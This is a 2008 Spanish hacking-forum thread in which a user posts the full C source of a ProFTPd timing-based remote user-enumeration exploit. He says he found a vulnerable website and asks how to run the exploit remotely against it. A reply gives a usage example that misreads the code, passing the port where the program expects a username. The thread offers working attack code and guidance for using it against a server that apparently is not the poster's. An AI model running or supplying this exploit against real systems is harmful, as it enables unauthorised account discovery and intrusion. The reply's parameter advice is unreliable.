elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
25 Mayo 2012, 20:47  


Tema destacado:


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  Parametros de un exploit		 0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Parametros de un exploit  (Leído 1,665 veces)
new_faq

Desconectado Desconectado

Mensajes: 5


Ver Perfil
Parametros de un exploit
« en: 27 Febrero 2008, 13:01 »
Salu2 a to2! Antes de preguntar las dudas que tengo, decir que tengo conocimientos en PHP (medio/avanzado) , SQL, C (Java y Visual un poco olvidado). Digo ésto más que nada para que no me prejuzguéis como el típico newbie que pregunta como hackear hotmail o que le da igual entender que es un exploit y lo único que le interesa es que le digan como ejecutarlo ....

Después del "discurso" paso a preguntaros un par de dudas que me han surgido con el tema exploits.

Después de encontrar una vulnerabilidad en cierta web proseguí a encontrar el exploit en concreto (en C) pero me surgen un par de dudas.

Este es el exploit en concreto:

Código:
// ProFTPd remote users discovery based on code execution time - POC exploit
// Coded by Leon Juranic // http://www.lss.hr

#include <sys/socket.h>
#include <sys/types.h>
#include <stdio.h>
#include <arpa/inet.h>
#include <sys/time.h>

#define PORT 21
#define PROBE 8

main (int argc, char **argv)
{
  int sock,n,y;
  long dist,stat=0;
  struct sockaddr_in sin;
  char buf[1024], buf2[1024];
  struct timeval tv, tv2;
  struct timezone tz, tz2;

  printf ("Proftpd remote users discovery exploit\n"
          " Coded by Leon / LSS Security\n"
          ">-------------------------------------<\n");

  if (argc != 3) { printf ("usage: %s ",argv[0]); exit(0); }
 
  sock = socket (AF_INET, SOCK_STREAM, 0);
  sin.sin_family = AF_INET;
  sin.sin_port = htons (PORT);
  sin.sin_addr.s_addr = inet_addr (argv[1]);
  bzero (sin.sin_zero,8);

  connect (sock, (struct sockaddr*)&sin, sizeof(struct sockaddr));

  printf ("Login time: ");
  n = read (sock,buf2, sizeof(buf2));
  for (y=0;y<PROBE;y++) {
     gettimeofday (&tv,&tz);
     snprintf (buf, sizeof(buf)-1,"USER %s\r\n",argv[2]);
     write (sock, buf, strlen(buf));
     n = read (sock,buf2, sizeof(buf2));
     gettimeofday (&tv2,&tz2);
     dist =tv2.tv_usec - tv.tv_usec;
     stat += dist;
     printf (" %d |",dist);
  }
  printf ("\nAvrg: %d\n",(stat/PROBE));
  close (sock);
}


El tema compilar no es ningun problema ya que si sabes C se supone que ésto lo sabes hacer. El problema es que no viene ningun tipo de información sobre los parámetros que le tengo que pasar para que se ejecute remotamente (ya que es un exploit remoto).

Espero que alguien de vosotros me pueda echar una mano.

Gracias.
En línea
new_faq

Desconectado Desconectado

Mensajes: 5


Ver Perfil
Re: Parametros de un exploit
« Respuesta #1 en: 27 Febrero 2008, 13:22 »
Ya he compilado el exploit.

http://www.cuelgalo.com/viewer.php?id=1204115254_exp.JPG

Y justamente es éso. El exploit no hace nada si no lo paso parametros, aparte que yo lo quiero ejecutar remotamente y no entiendo que logro ejecutando un simple .exe

Espero vuestras respuestas gracias.

La URL no sale bien .. no sé porqué ... ponedla en el navegador.
« Última modificación: 27 Febrero 2008, 13:27 por new_faq » En línea
BBOYHACK

Desconectado Desconectado

Mensajes: 169


#Bboyhacks#


Ver Perfil WWW
Re: Parametros de un exploit
« Respuesta #2 en: 27 Febrero 2008, 16:38 »
amigo si no me equivoco ese exploit te da los usuarios validos del ftp despues de copilarlo tendrias que colocarlo algo haci

en caso de windows

exploit.exe 127.0.0.1 21

en caso de linux

exploit.bin 127.0.0.1 21

este es un ejemplo dond (127.0.0.1) seria la ip de la web y (21) seria el puerto

cualquier duda post
En línea
lastimosamente no puedo dirigirme a un cajero de un banco y decirle alto y claro:
Soy Bill Gates y deseo retirar 2 Millones de dolares y mi codigo es Windows


Blackhacking.no-ip.org
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines